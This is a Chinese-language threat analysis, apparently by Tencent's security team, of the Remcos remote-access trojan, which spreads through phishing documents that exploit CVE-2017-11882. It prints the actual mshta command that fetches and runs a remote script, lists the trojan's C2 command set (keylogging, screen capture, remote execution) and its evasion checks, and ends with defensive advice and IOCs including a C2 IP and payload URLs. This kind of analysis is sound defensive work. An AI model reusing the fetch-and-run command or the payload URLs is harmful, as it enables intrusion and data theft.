新型远控木马Remcos利用CVE--11882漏洞进行实时攻击

时间:2024-05-20 09:57:55

0×1 概况

近期腾讯安全御见情报中心监测到利用CVE-2017-11882漏洞攻击的事件呈陡增趋势,在攻击洪流中,我们捕获到一款名为Remcos的远控木马通过鱼叉邮件进行传播。

Remcos木马是一款较新的远控木马,自2016年下半年开始在黑客论坛公开售卖,其后经过多次版本更新,功能日益强大。此前针对外贸行业的“商贸信”事件中,也曾出现该木马的身影。值得注意的是,同是利用公式编辑器漏洞,Remcos远控木马较之“商贸信”病毒,呈现出“急起直追”的趋势,在近期漏洞攻击事件中表现非常活跃。

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(“Remcos”官网售价情况)

0×2 载荷投递

在未修复CVE-2017-11882漏洞的机器上,双击打开邮件附件中的恶意word文档,公式编辑器会利用mshta.exe执行远程脚本,命令行为“mshta https://d.pr/Wuod3I/d.pr &AAAAAAAAAAAAC”。

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

远程脚本中的代码经过了简单的混淆,经过还原后,可以看到关键代码。脚本的主要作用是利用powershell下载和执行new.exe 。

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(还原后的关键代码)

0×3 RAT分析

下载到的木马new.exe为delphi语言编写,经过分析发现该delphi只是用来当壳的,从new.exe中可以dump真正的木马,即商业级的远控木马Remcos,主要功能有远程桌面、键盘键盘、下载和运行程序、文件和注册表等的各种操作,详细介绍请参考https://breaking-security.net/remcos-v1-9-7-released/

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(木马本尊的图标)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(商业级远控程序Remcos后台界面)

Remcos启动时会解密资源中的“SETTINGS”项,从而得到服务器ip、木马功能的各种配置项、互斥体名称等。解密后的“SETTINGS”项以“@@”为分隔符,被解析后存入一个数组,以数组的索引当作key,从而方便后续利用key找到相对应的value项。

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(解密后的settings项,pass为网络发包时的默认加密key)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

用到的mutex名称Remcos开头

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

用到的注册表项Remcos开头

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

用到的mutex名称Remcos开头

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(检测sandbox)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

检测虚拟机

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

检测vbox

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(检测调试)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(可以通过配置项显示console来打印日志)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

开启键盘记录器功能

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(将记录的按键信息存储在%appdata\remcos目录下,文件名为logs.dat)

 新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

发包时都以“[DataStart]”开头,加密后发送给c2

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

以“pass”来初始化加密table

 新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(加密算法第一部分,初始化加密table的函数)

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

(加密算法第二部分,利用加密table去加密)

协议body以”|cmd|”进行分割,分割后的第一个字符串为命令字,比如图中的“addnew”即为命令字。

新型远控木马Remcos利用CVE-2017-11882漏洞进行实时攻击

第一个包将计算名、用户名等信息发送给c2

服务器下发的命令字主要有:

主命令字 功能
ping 心跳包
keepaliveoff 在console中打印了一行日志
filemgr 上传本地文件的信息或下载、执行文件
downloadfromurl 下载并打开文件
downloadfromlocal 直接执行指定的文件
getproclist 上报进程列表
Prockill 结束指定的进程
getwindows 上报窗口列表
closewindow 关闭窗口
maxwindow 最大化窗口
restorewindow 恢复窗口
closeprocfromwindow 结束带指定窗口的进程
execcom 利用WinExec执行文件
consolecmd 执行cmd命令
openaddress ShellExecuteW open
initializescrcap 初始化屏幕截图
freescrcap 释放屏幕截图时的相关资源
initklfrm 初始化键盘记录
startonlinekl 开启实时键盘记录
stoponlinekl 停止实时键盘记录
getofflinelogs 上传离线模式下记录的按键信息
autogetofflinelogs 自动获取离线下的按键信息
deletekeylog 删除键盘记录的文件
clearlogins 清除cookies及login信息
getscrslist 上报文件列表信息
dwnldscr 上报存储在本地截图信息
initcamcap 初始化远程桌面时的socket等资源
freecamcap 释放远程桌面时的资源
miccapture 获取播放的声音的信息
stopmiccapture 停止监控声音设备
initpwgrab  
deletefile 删除文件
close 结束某进程
uninstall 删除木马安装时的相关信息
updatefromurl 从网上下载并更新木马文件
updatefromlocal 利用已下载好的文件更新木马文件
msgbox 弹框
keyinput 模拟按键
mclick 点击鼠标
OSpower 操作电源按钮
getclipboard 获取剪贴板中的信息
setclipboard 设置剪贴板中的数据
emptyclipboard 清空剪贴板
dlldata 将dll映射进内存
dllurl 将下载的dll映射进内存
initregedit 注册表相关的操作
initchat 初始化聊天相关的功能
renamebck 改注册表中的name项
initsocks 初始化socket

0×4 安全建议

CVE-2017-11882公式编辑器漏洞补丁发布已近半年,攻击者仍亲睐使用此漏洞进行攻击,部分用户因未安装漏洞补丁导致木马入侵成功,在此提醒广大用户应及时使用腾讯电脑管家等安全软件更新系统补丁,以防御漏洞攻击,同时不要打开来历不明的邮件附件。

该木马功能强大、键盘记录、远程桌面、文件、注册表、进程等各种远控功能都有,同时利用了先进的自加载技术来躲避杀毒软件的检测,隐蔽性较高。企业用户可按以下方法进行自查或防范:

1. 该木马会在%appdata%目录下创建名为remcos的隐藏文件夹

2. 该木马会创建名为ros的开机自启动项

3. 根据下文的c2信息检测3440端口的网络连接情况或禁用此端口

腾讯御界高级威胁检测系统基于腾讯反病毒实验室的安全能力,依托腾讯在云和端的大数据,形成了强大且独特的威胁情报和恶意检测模型,凭借基于行为的防护和智能模型两大核心能力,能高效检测未知威胁,并实时阻拦钓鱼邮件、恶意宏文档等攻击方式。 

附录(IOCs):

Md5:

6e421f7c63d9a894546d532d017c604a

48E27626AB41E8569405546360700546 

7bfcf044fb11a252a71f0fd1753882ec

0a591617e781ff3722bc2fa716599eae

991F2506786A6B29D254B6D195C656D5

C2:

185.171.25.7

Urls:

https://d.pr/Wuod3I/d.pr

HTTPS://d.pr/Nn9rd2/d.pr/

https://d.pr/fHDdHh/d.pr

https://d.pr/51iOqj/d.pr

https://d.pr/chchxc/d.pr

https://d.pr/yuKlVS/d.pr

关键目录:

%appdata%\ros

%appdata%\remcos